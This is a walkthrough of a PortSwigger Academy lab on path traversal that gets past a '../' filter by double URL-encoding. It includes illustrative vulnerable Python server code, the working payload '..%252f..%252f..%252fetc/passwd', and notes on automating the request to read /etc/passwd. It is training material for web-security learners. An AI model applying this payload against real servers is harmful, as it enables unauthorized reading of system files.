File path traversal, traversal sequences stripped with superfluous URL-decode
Detailed analysis of the lab 'File path traversal, traversal sequences stripped with superfluous URL-decode' from the PortSwigger Academy Path traversal series
This lab contains a path traversal vulnerability in the display of product images. The application blocks input containing path traversal sequences. It then performs a URL-decode of the input before using it. To solve the lab, retrieve the contents of the /etc/passwd file.
Lab Setup & Files
Files and Environment
Files: None
Initial Analysis
First Steps
This lab targets the same parameter as the first lab in the series (File path traversal, simple case), which you can refer to for the basics. The difference is that here the payload is URL-decoded before the file is retrieved. Let's move on to the exploitation phase.
Vulnerability Analysis
Potential Attack Vectors
Path Traversal
Solution Path
Step-by-Step Guide
Initial setup
First, let's understand what URL encoding is. When browsing the web, we often come across URLs containing sequences like %25. This is called URL encoding.
It avoids ambiguity on the server side, because some characters have a special meaning in a URL (for example ?, & and /), much like wildcards such as * in a Linux shell.
URL encoding is also known as percent encoding because it replaces a character with % followed by its two-digit hexadecimal ASCII code. For example, / becomes %2f and % itself becomes %25.
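To make the hexadecimal mapping concrete, here is a minimal sketch using Python's urllib.parse. The helper name percent_encode_char is hypothetical and only exists for illustration. Note that Python emits uppercase hex digits (%2F) while this write-up uses lowercase (%2f); both decode to the same character.

```python
from urllib.parse import quote, unquote


def percent_encode_char(ch: str) -> str:
    """Percent-encode one ASCII character by hand: '%' plus two hex digits."""
    return "%{:02X}".format(ord(ch))


for ch in ["/", "%", " "]:
    # quote(..., safe="") encodes every reserved character, including "/"
    print(repr(ch), "->", percent_encode_char(ch), quote(ch, safe=""))

# Decoding is case-insensitive with respect to the hex digits.
print(unquote("%2f") == unquote("%2F"))
```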
Now, for a practical example of how the server might be structured, I'll use Python and the urllib.parse library, the standard module for parsing and quoting URLs.
Most likely, the server has code similar to this:
filename = request.args.get('filename', '')
if "../" in filename:
    return "Resources Not Found", 404
decoded_filename = urllib.parse.unquote(filename)
...
This code retrieves the filename parameter from the GET request, checks if it contains the dot-dot-slash path traversal sequence, and then performs URL decoding before using it as a path to return the requested resource.
(This is just an example, of course!)
If we try to pass ../../../etc/passwd, we will be blocked. However, it's important to consider that the value returned by request.args.get() has already been URL-decoded once.
So, if we encode the payload only once, it will be decoded into ../../../etc/passwd, triggering the security check and blocking our request.
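The behaviour described so far can be simulated without a web framework. The sketch below is only an assumption about how the server might work: handle_image_request is a hypothetical function, and the /var/www/images/ base directory is assumed for illustration. The first unquote call stands in for the decoding done when the query string is parsed.

```python
from urllib.parse import unquote


def handle_image_request(raw_query_value: str) -> str:
    """Hypothetical stand-in for the lab's image handler."""
    # Step 1: the framework decodes the query string once while parsing it.
    filename = unquote(raw_query_value)
    # Step 2: the filter rejects literal traversal sequences.
    if "../" in filename:
        return "blocked"
    # Step 3: the superfluous second decode, applied after the check.
    decoded_filename = unquote(filename)
    # Assumed base directory; the real one is not known from the lab text.
    return "would open: /var/www/images/" + decoded_filename


# Both the raw and the single-encoded payload reach the filter as "../".
print(handle_image_request("../../../etc/passwd"))
print(handle_image_request("..%2f..%2f..%2fetc/passwd"))
```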
Let's move on to the next phase.
Exploitation
To bypass the security check, we can simply apply double URL encoding.
This way, request.args.get() decodes our payload only once, turning the path traversal sequence ..%252f into ..%2f, which is still an encoded form of ../.
Since "../" != "..%2f", this will bypass the filter. Then, when the second URL decoding occurs before returning the resource, the path will be correctly interpreted.
To perform URL encoding, we can use Python's urllib.parse library or CyberChef:
[Image: Double Url Decode]
With double encoding, / becomes %252f. The first encoding transforms / into %2f.
Then, in the second encoding, only % is encoded as %25, resulting in %252f.
When the server applies the first decoding, %252f turns into %2f, which is not equal to /.
Therefore, it bypasses the security check:
[Image: Url Decode]
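The same encode and decode steps can be reproduced with urllib.parse instead of CyberChef. This is a small sketch; the variable names are illustrative, and Python prints uppercase hex (%2F, %252F), which is equivalent to the lowercase form used in the payload.

```python
from urllib.parse import quote, unquote

traversal = "../"
once = quote(traversal, safe="")   # "/" is encoded, dots are left alone
twice = quote(once, safe="")       # only "%" changes, becoming "%25"
print(once, twice)

# Decode step by step, as the server is assumed to do.
after_first_decode = unquote(twice)
filter_triggers = "../" in after_first_decode   # what the security check sees
after_second_decode = unquote(after_first_decode)
print(after_first_decode, filter_triggers, after_second_decode)
```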
Now, we can construct the final payload: filename=..%252f..%252f..%252fetc/passwd
Making a request to: https://0ac4003503712887854b916d00f50069.web-security-academy.net/image?filename=..%252f..%252f..%252fetc/passwd
This allows us to access /etc/passwd:
[Image: Passwd]
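For reference, the request can also be built and sent from Python with the standard library alone. This is a sketch, not the exploit script mentioned later: build_image_url and fetch are hypothetical helpers, and the hostname is the lab instance from this write-up, which will differ for every lab session. The URL is passed to urllib.request as an already-encoded string, so no extra encoding step is assumed here.

```python
import urllib.request

# Lab instance from this write-up; replace it with your own instance URL.
LAB_HOST = "https://0ac4003503712887854b916d00f50069.web-security-academy.net"


def build_image_url(host: str, depth: int = 3, target: str = "etc/passwd") -> str:
    """Build the /image URL with a double-encoded traversal prefix."""
    return f"{host}/image?filename=" + "..%252f" * depth + target


def fetch(url: str) -> str:
    """Request the URL and return the response body as text."""
    with urllib.request.urlopen(url) as response:
        return response.read().decode("utf-8", errors="replace")


url = build_image_url(LAB_HOST)
print(url)
# To actually send the request against a live lab instance:
# print(fetch(url))
```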
Solution Confirmation
[Image: Lab Solution]
Exploitation Process
Technical Approach
The automatic exploit performs a simple GET request with the parameter: filename=..%2f..%2f..%2fetc%2fpasswd.
However, remember that we need double encoding.
So why did I only apply single encoding in the exploit?
The reason is that the requests library automatically URL-encodes parameter values before sending the request.
Any raw % in the payload therefore becomes %25, so requests performs the second encoding for us, as long as the payload we pass is already encoded once.
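This effect can be approximated with the standard library's urlencode, which, to my knowledge, is what requests relies on when building the query string from params. The snippet is a sketch of the encoding step only, not requests' actual code path, and it sends nothing over the network.

```python
from urllib.parse import unquote, urlencode

# Single-encoded payload, as it would be passed in the params dictionary.
params = {"filename": "..%2f..%2f..%2fetc%2fpasswd"}

# Encoding the value again turns every "%" into "%25".
query = urlencode(params)
print(query)

# Two decodes on the server side recover the raw traversal path.
value = query.split("=", 1)[1]
recovered = unquote(unquote(value))
print(recovered)
```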
The first encoding can be done with urllib.parse.quote, whose documentation reads: Replace special characters in _string_ using the `%_xx_` escape. Letters, digits, and the characters `'_.-~'` are never quoted. By default, this function is intended for quoting the path section of a URL. The optional _safe_ parameter specifies additional ASCII characters that should not be quoted; its default value is `'/'`.
As we can see, / is the default value of safe, so if we don't pass the safe parameter, / will not be encoded at all:
[Image: Wrong Quote]
However, we can set safe to an empty string:
urllib.parse.quote("../../../etc/passwd", safe="")
This way, / is no longer treated as a safe character and will be properly encoded:
[Image: Correct Quote]
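The two cases can be compared side by side in a short script. The variable names are illustrative only.

```python
from urllib.parse import quote

payload = "../../../etc/passwd"

# Default call: safe="/" so slashes are left untouched.
default_safe = quote(payload)
# Empty safe string: "/" is encoded like any other reserved character.
no_safe = quote(payload, safe="")

print(default_safe)
print(no_safe)
```

The second form is the single-encoded payload; Python writes it with uppercase hex digits, which the server decodes the same way as lowercase ones.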
I wanted to clarify this because I'll also include an alternative version of the exploit that doesn't require manually encoding characters with CyberChef.